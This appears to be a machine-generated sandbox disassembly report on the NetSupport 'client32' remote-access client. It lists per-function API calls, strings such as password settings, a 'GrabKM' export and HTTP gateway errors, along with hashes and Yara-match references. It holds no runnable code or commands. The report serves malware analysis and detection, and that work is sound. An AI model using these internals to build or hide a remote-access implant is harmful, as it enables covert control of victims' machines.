Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
Instruction ID: f6baba5e36d17a1f61544e27a43f00c9efa3f214cb3d29d370909431fefea075
Opcode Fuzzy Hash: 138740f618a786b5ee3efac041f3e8d7d14c2bebde02be3fe677fdfd87e3208f
Instruction Fuzzy Hash: 9B12E639C046A78FDB56CF24C890BD8BBA0AB3634CF5440E9DCD597241EB71958ACF92

Function 1102ED27 Relevance: 40.7, APIs: 13, Strings: 10, Instructions: 441
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 1102ED78

Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

RegCloseKey.KERNEL32(?), ref: 1102EE0D

Part of subcall function 11152C8A: __isdigit_l.LIBCMT ref: 11152CAF

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1102EE95
GetProcAddress.KERNEL32(00000000), ref: 1102EE9C
GetNativeSystemInfo.KERNEL32(?), ref: 1102EEAA
GetStockObject.GDI32(0000000D), ref: 1102F083
GetObjectA.GDI32(00000000,0000003C,?), ref: 1102F093
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D1
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F0D7
InterlockedExchange.KERNEL32(02618BE8,00001388), ref: 1102F158
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 1102F18A

Strings

kernel32.dll, xrefs: 1102EE8E
GetNativeSystemInfo, xrefs: 1102EE89
3, xrefs: 1102EE37
CurrentVersion, xrefs: 1102ED99
u:j$*6, xrefs: 1102F23D
pcicl32, xrefs: 1102F25D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 1102ED68
M7, xrefs: 1102F11E
Error %s unloading audiocap dll, xrefs: 1102F396
.%d, xrefs: 1102F194

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$AddressCloseExchangeHandleInfoInterlockedModuleNativeOpenProcQueryStockSystemValue__isdigit_l
String ID: .%d$3$CurrentVersion$Error %s unloading audiocap dll$GetNativeSystemInfo$SOFTWARE\Microsoft\Windows NT\CurrentVersion$kernel32.dll$pcicl32$u:j$*6$M7
API String ID: 3742979543-1875362328
Opcode ID: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
Instruction ID: 9d50fd4c4b4771c4e818bae6168a3bc14b0d19ca60a63814d56272cf95f99725
Opcode Fuzzy Hash: b30e950a16208c9b80ba5814f786be33e61252569c30e4c8fcf91a30b9764def
Instruction Fuzzy Hash: 8CF156B5D01265DEEF91CB60CC88BDDFAF4AB0530CF5441AEEC09A7281EA755E84CB52

Function 6CC751C0 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 286
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 6CC751F5
GetTickCount.KERNEL32 ref: 6CC75240
Sleep.KERNEL32(00000064), ref: 6CC75275

Part of subcall function 6CC74F90: GetTickCount.KERNEL32 ref: 6CC74FA1

WaitForSingleObject.KERNEL32(?,?), ref: 6CC75296
_memmove.LIBCMT ref: 6CC752AD
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6CC752CE
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6CC752F3
GetTickCount.KERNEL32 ref: 6CC75306

Strings

FALSE, xrefs: 6CC754D4
ResumeTimeout, xrefs: 6CC751DA
e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6CC754CF
httprecv, xrefs: 6CC751FD

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: CountTick$Sleep$ObjectSingleWait_memmoveselect
String ID: FALSE$ResumeTimeout$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$httprecv
API String ID: 1069524698-4272157152
Opcode ID: cfa39fcb1557cf5c0db73e103f967c19cec14957d2bdb32d8c295a51dc80b3af
Instruction ID: b3b35b46de076014735cd04712647f45b36738cf26baf80516465619892dae50
Opcode Fuzzy Hash: cfa39fcb1557cf5c0db73e103f967c19cec14957d2bdb32d8c295a51dc80b3af
Instruction Fuzzy Hash: 28B1A2B1D012589FDB20CF64CD88BDA77B4FB45308F4041AAE549A7A40E7B59EC4CFA1

Function 11130D40 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 11130DFA

Strings

NSM.LIC, xrefs: 11130E00
Info. Policy changed - reload transports..., xrefs: 111314B5
_debug, xrefs: 11131267
RoomSpec, xrefs: 11131509, 1113152D
Add [%s]%s=%s, xrefs: 111312B7
Client, xrefs: 1113150E, 11131532
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11131577
client., xrefs: 111311F6
Del [%s]%s=%s, xrefs: 11131315
Info. Policy changed - re-initui, xrefs: 11131491
TracePolicyChange, xrefs: 11131262
Warning. Can't calc AD policy changes, xrefs: 11131235
client, xrefs: 11131213
NSA.LIC, xrefs: 11130E0F, 11130E16, 11130E3D
Info. Lockup averted for AD policy changes, xrefs: 11130FCD, 11130FF4
Chg [%s]%s=%s, xrefs: 11131375
IsA(), xrefs: 1113157C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Close
String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
API String ID: 3535843008-1157355927
Opcode ID: ce19f266f601b96e18726c5edab141c344f333186d4e6c5b04059f51b9171314
Instruction ID: 92f743161b8d2e512d760a62df3d5c411700057ac8f76655c4977d74fc17002b
Opcode Fuzzy Hash: ce19f266f601b96e18726c5edab141c344f333186d4e6c5b04059f51b9171314
Instruction Fuzzy Hash: A0420574E102959BEB21CB60CD40FDEFBB5AFC5319F0441D8D90967285EA726E84CF61

Function 110FC270 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 234libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas), ref: 110FC34A
CloseHandle.KERNEL32(00000000), ref: 110FC359
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 110FC36B
LoadLibraryA.KERNEL32(?), ref: 110FC3A1
GetProcAddress.KERNEL32(?,GrabKM), ref: 110FC3CE
GetProcAddress.KERNEL32(?,LoggedOn), ref: 110FC3E6
FreeLibrary.KERNEL32(?), ref: 110FC40B

Part of subcall function 11102700: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11103735,111032D0,00000001,00000000), ref: 11102717
Part of subcall function 11102700: CreateThread.KERNEL32(00000000,11103735,00000001,00000000,00000000,0000000C), ref: 1110273A
Part of subcall function 11102700: WaitForSingleObject.KERNEL32(?,000000FF,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102767
Part of subcall function 11102700: CloseHandle.KERNEL32(?,?,11103735,111032D0,00000001,00000000,?,?,?,?,?,1102F49F), ref: 11102771

GetStockObject.GDI32(0000000D), ref: 110FC41F
GetObjectA.GDI32(00000000,0000003C,?), ref: 110FC42F
InitializeCriticalSection.KERNEL32(0000003C), ref: 110FC44B
InitializeCriticalSection.KERNEL32(111DBDA4), ref: 110FC456

Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
Part of subcall function 110FA7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC

CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC499

Part of subcall function 11096D20: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
Part of subcall function 11096D20: OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48
Part of subcall function 11096D20: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67

CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC4EA
CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC543
CloseHandle.KERNEL32(00000000,Function_000F6330,00000001,00000000), ref: 110FC587

Strings

LoggedOn, xrefs: 110FC3E0
\pcigina, xrefs: 110FC380
GrabKM, xrefs: 110FC3C8
nsm_gina_sas, xrefs: 110FC334
LPT1, xrefs: 110FC329

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
API String ID: 3930710499-403456261
Opcode ID: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
Instruction ID: 96122f269ef65589949905bb9c4ffe43a99982700637f7301abdf7ec8998ec3b
Opcode Fuzzy Hash: b4f7a2aa001f08eb1de94084590e4a4e84de2b21180eea1441a02a77e5a43ed9
Instruction Fuzzy Hash: 859191B5E01756AFDB11CFB48D8AB9EBBE4BB05308F044579E55AD7280E770AA40CB11

Function 1106F530 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 294threadtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 1106F615
InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1106F61B
InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 1106F621
InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 1106F62A
InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 1106F630
InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 1106F636
_strncpy.LIBCMT ref: 1106F698
ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 1106F6FF
CreateThread.KERNEL32(00000000,00004000,Function_0006B810,00000000,00000000,?), ref: 1106F79C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1106F7A3
SetTimer.USER32(00000000,00000000,000000FA,1105EF40), ref: 1106F7E7
std::exception::exception.LIBCMT ref: 1106F898
__CxxThrowException@8.LIBCMT ref: 1106F8B3

Strings

destroy_queue == NULL, xrefs: 1106F64B
..\ctl32\Connect.cpp, xrefs: 1106F646
Password, xrefs: 1106F753
DefaultUsername, xrefs: 1106F6E0
RememberPassword, xrefs: 1106F6B0
General, xrefs: 1106F6B5, 1106F6E5, 1106F758

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
API String ID: 703120326-1497550179
Opcode ID: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
Instruction ID: 100f990ebe536f4ae5a6f41c30aeaeafdd91ca27a0176a8e63e6253bf368b8ee
Opcode Fuzzy Hash: cc7903dda24a66739fd7a13bbda9e0872c732d56e2d593b364654cf261e7dd3c
Instruction Fuzzy Hash: 0FB1B5B5A00745AFDB10CF64CD84FDAF7F8BB48708F4085A9E60997281E7B0BA44CB65

Function 11129920 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A78400), ref: 11134490
Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF

PostMessageA.USER32(00010486,000006CF,00000007,00000000), ref: 11129AFF

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

SetWindowTextA.USER32(00010486,00000000), ref: 11129BA7
IsWindowVisible.USER32(00010486), ref: 11129C6C
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11129C8C
IsWindowVisible.USER32(00010486), ref: 11129C9A
SetForegroundWindow.USER32(00000000), ref: 11129CC8
EnableWindow.USER32(00010486,00000001), ref: 11129CD7
IsWindowVisible.USER32(00010486), ref: 11129D28
IsWindowVisible.USER32(00010486), ref: 11129D35
EnableWindow.USER32(00010486,00000000), ref: 11129D49
EnableWindow.USER32(00010486,00000000), ref: 11129CAF

Part of subcall function 111228E0: ShowWindow.USER32(00010486,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE

EnableWindow.USER32(00010486,00000001), ref: 11129D5D

Strings

ViewedText, xrefs: 11129A2B
LockedText, xrefs: 11129A7F
Client, xrefs: 111299A1, 11129A4B, 11129A84, 11129AE2
HideWhenIdle, xrefs: 1112999C
ShowUIOnConnect, xrefs: 11129ADD
ConnectedText, xrefs: 11129A38, 11129A47

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$CloseMessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 4194384052-3803836183
Opcode ID: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
Instruction ID: 8305938ea656916a4b1fbafb187925e2d273a1d2ad477454ab730d3f5b69f352
Opcode Fuzzy Hash: e43bb21f673ef14eee2c9dbecfac9de94a1951a9e343f6d3e521405f1ec23232
Instruction Fuzzy Hash: D3C1E575A012799FEF01DBA8DD84B5EF7A6AB4038CF604035ED199B2C4FB75A804CB91

Function 6CC68270 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 189libraryloadernetworkCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6CC6830B
GetTickCount.KERNEL32 ref: 6CC68365
InterlockedExchange.KERNEL32(?,-6CCA8150), ref: 6CC68376
GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6CC683AA
WSAGetLastError.WSOCK32(?,00000000,?), ref: 6CC683CF
InterlockedIncrement.KERNEL32(?), ref: 6CC68491

Strings

Error %d sending HTTP request on connection %d, xrefs: 6CC6842B
Error %d writing inet request on connection %d, xrefs: 6CC683D9
Error send returned 0 on connection %d, xrefs: 6CC68445
SendHttpReq failed, not connected to gateway!, xrefs: 6CC682C1
InternetWriteFile, xrefs: 6CC683A4
%02x %02x, xrefs: 6CC68305
xx %02x, xrefs: 6CC68319

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: Interlocked$AddressCountErrorExchangeIncrementLastProcTickwsprintf
String ID: %02x %02x$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$InternetWriteFile$SendHttpReq failed, not connected to gateway!$xx %02x
API String ID: 642105747-610509312
Opcode ID: 9eccf634d8c0cdbc28c01eda0676ce4e8019c6d72ca307eca283dc8399f9dbe0
Instruction ID: 957f13895673fc7e6d99d66c278e7d6d422f2183206c2fa844045eb60196b492
Opcode Fuzzy Hash: 9eccf634d8c0cdbc28c01eda0676ce4e8019c6d72ca307eca283dc8399f9dbe0
Instruction Fuzzy Hash: 5B61B0B1D006049FDB10CFA5D984EAEB7B4FF45318F14462AE915A7F41EB31A919CFA0

Function 1102EA18 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 186librarysynchronizationloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102EB44
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EB5D
LoadLibraryA.KERNEL32(User32.dll,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EBBA
GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1102EBF8
SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC0B
WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC3C
CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC49
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC54
CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102EC5B

Strings

User32.dll, xrefs: 1102EBB2
_debug\trace, xrefs: 1102EA9B
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1102EA81
/247, xrefs: 1102EB69
istaUI, xrefs: 1102EA64
B`, xrefs: 1102EA39
PCIMutex, xrefs: 1102EB35, 1102EB54
_debug\tracefile, xrefs: 1102EAAC
SetProcessDPIAware, xrefs: 1102EBEE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleLibraryMutex$AddressCreateErrorFreeLastLoadObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$User32.dll$_debug\trace$_debug\tracefile$istaUI$B`
API String ID: 2633444001-3660454586
Opcode ID: ae551b03b65906b97426a76e9e5f6dedac2389bce539edba93c32e175c85bc09
